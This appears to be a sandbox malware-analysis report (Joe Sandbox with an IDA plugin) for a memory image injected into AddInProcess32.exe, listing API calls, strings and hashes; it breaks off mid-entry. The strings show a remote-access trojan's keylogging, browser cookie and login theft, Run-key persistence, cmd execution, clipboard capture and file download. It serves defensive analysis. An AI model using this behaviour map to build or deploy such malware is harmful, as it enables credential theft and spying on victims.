                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountEventTick
                  • String ID: !D@$NG
                  • API String ID: 180926312-2721294649
                  APIs
                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                    • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Similarity
                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                  • String ID: XQG$NG$PG
                  • API String ID: 1634807452-3565412412
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: `#D$`#D
                  • API String ID: 885266447-2450397995
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443475
                  • _free.LIBCMT ref: 00443540
                  • _free.LIBCMT ref: 0044354A
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  • API String ID: 2506810119-760905667
                  APIs
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                  • GetLastError.KERNEL32 ref: 0044B931
                  Similarity
                  • API ID: ByteCharErrorFileLastMultiWideWrite
                  • String ID: PkGNG
                  • API String ID: 2456169464-263838557
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                  Similarity
                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                  • String ID: /sort "Visit Time" /stext "$0NG
                  • API String ID: 368326130-3219657780
                  APIs
                  • SystemParametersInfoW.USER32 ref: 0041CAD7
                    • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                    • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000), ref: 004137A6
                    • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C), ref: 004137B1
                  Similarity
                  • API ID: CloseCreateInfoParametersSystemValue
                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                  • API String ID: 4127273184-3576401099
                  APIs
                  • _wcslen.LIBCMT ref: 004162F5
                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                    • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                    • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                    • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                  Similarity
                  • API ID: _wcslen$CloseCreateValue
                  • String ID: !D@$okmode$PG
                  • API String ID: 3411444782-3370592832
                  APIs
                    • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                  Strings
                  • User Data\Default\Network\Cookies, xrefs: 0040C603
                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                  • API String ID: 1174141254-1980882731
                  APIs
                    • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                  Strings
                  • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                  • API String ID: 1174141254-1980882731
                  APIs
                  • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                  • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                  • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                  Similarity
                  • API ID: CreateThread$LocalTimewsprintf
                  • String ID: Offline Keylogger Started
                  • API String ID: 465354869-4114347211
                  APIs
                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                  • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                  • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                  Similarity
                  • API ID: CreateThread$LocalTime$wsprintf
                  • String ID: Online Keylogger Started
                  • API String ID: 112202259-1258561607
                  APIs
                  • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  Similarity
                  • API ID: LocalTime
                  • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                  • API String ID: 481472006-3277280411
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                  Strings
                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                  Similarity
                  • API ID: Create$EventLocalThreadTime
                  • String ID: KeepAlive | Enabled | Timeout:
                  • API String ID: 2532271599-1507639952
                  APIs
                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                  • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: CryptUnprotectData$crypt32
                  • API String ID: 2574300362-2380590389
                  APIs
                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000), ref: 0044C28C
                  • GetLastError.KERNEL32 ref: 0044C296
                  • __dosmaperr.LIBCMT ref: 0044C29D
                  Similarity
                  • API ID: ErrorFileLastPointer__dosmaperr
                  • String ID: PkGNG
                  • API String ID: 2336955059-263838557
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                  • CloseHandle.KERNEL32(?), ref: 004051CA
                  • SetEvent.KERNEL32(?), ref: 004051D9
                  Similarity
                  • API ID: CloseEventHandleObjectSingleWait
                  • String ID: Connection Timeout
                  • API String ID: 2055531096-499159329
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                  Similarity
                  • API ID: Exception@8Throw
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 2005118841-1866435925
                  APIs
                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                  • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                  Similarity
                  • API ID: FormatFreeLocalMessage
                  • String ID: @J@$PkGNG
                  • API String ID: 1427518018-1416487119
                  APIs
                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                  • RegSetValueExW.ADVAPI32 ref: 0041384D
                  • RegCloseKey.ADVAPI32(?), ref: 00413858
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                  Similarity
                  • API ID: CloseCreateValue
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                  • API String ID: 1818849710-1051519024
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                    • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                  Similarity
                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                  • String ID: bad locale name
                  • API String ID: 3628047217-1405518554
                  APIs
                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                  • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000), ref: 004137A6
                  • RegCloseKey.ADVAPI32(0046611C), ref: 004137B1
                  Similarity
                  • API ID: CloseCreateValue
                  • String ID: Control Panel\Desktop
                  • API String ID: 1818849710-27424756
                  APIs
                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                  • ShowWindow.USER32(00000009), ref: 00416C61
                  • SetForegroundWindow.USER32 ref: 00416C6D
                    • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                    • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                    • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                  Similarity
                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                  • String ID: !D@
                  • API String ID: 3446828153-604454484
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                  Similarity
                  • API ID: ExecuteShell
                  • String ID: /C $cmd.exe$open
                  • API String ID: 587946157-3896048727
                  APIs
                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: GetCursorInfo$User32.dll
                  • API String ID: 1646373207-2714051624
                  APIs
                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetLastInputInfo$User32.dll
                  • API String ID: 2574300362-1519888992
                  • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                  • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                  • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                  • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                  APIs
                  Strings
                  • Cleared browsers logins and cookies., xrefs: 0040C0F5
                  • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Sleep
                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                  • API String ID: 3472027048-1236744412
                  • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                  • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                  • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                  • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                  APIs
                    • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                    • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                    • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                  • Sleep.KERNEL32(000001F4), ref: 0040A573
                  • Sleep.KERNEL32(00000064), ref: 0040A5FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$SleepText$ForegroundLength
                  • String ID: [ $ ]
                  • API String ID: 3309952895-93608704
                  • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                  • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                  • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                  • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                  • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                  • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                  • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                  • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                  • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                  • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                  APIs
                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041C4D7
                  • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleReadSize
                  • String ID:
                  • API String ID: 3919263394-0
                  • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                  • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                  • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                  • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                  APIs
                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                  • CloseHandle.KERNEL32(00000000), ref: 0041C233
                  • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 39102293-0
                  • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                  • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                  • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                  • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                    • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                  • _UnwindNestedFrames.LIBCMT ref: 00439891
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                  • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                  • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                  • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: MetricsSystem
                  • String ID:
                  • API String ID: 4116985748-0
                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                  • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                  • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                    • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                  • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                  • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                  APIs
                  • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorHandling__start
                  • String ID: pow
                  • API String ID: 3213639722-2276729525
                  • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                  • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                  • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                  • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                  APIs
                  • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                  • GetLastError.KERNEL32 ref: 00449F2B
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharErrorLastMultiWide
                  • String ID: PkGNG
                  • API String ID: 203985260-263838557
                  • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                  • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                  • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                  • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                  APIs
                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                  • __Init_thread_footer.LIBCMT ref: 0040B797
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Init_thread_footer__onexit
                  • String ID: [End of clipboard]$[Text copied to clipboard]
                  • API String ID: 1881088180-3686566968
                  • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                  • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                  • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                  • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                  APIs
                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ACP$OCP
                  • API String ID: 0-711371036
                  • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                  • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                  • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                  • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B7DB
                  • GetLastError.KERNEL32 ref: 0044B804
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorFileLastWrite
                  • String ID: PkGNG
                  • API String ID: 442123175-263838557
                  • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                  • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                  • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                  • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B6ED
                  • GetLastError.KERNEL32 ref: 0044B716
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorFileLastWrite
                  • String ID: PkGNG
                  • API String ID: 442123175-263838557
                  • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                  • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                  • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                  • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                  APIs
                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                  Strings
                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocalTime
                  • String ID: KeepAlive | Enabled | Timeout:
                  • API String ID: 481472006-1507639952
                  • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                  • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                  • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                  • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                  APIs
                  • Sleep.KERNEL32 ref: 00416640
                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                  Strings
                  Memory Dump Source
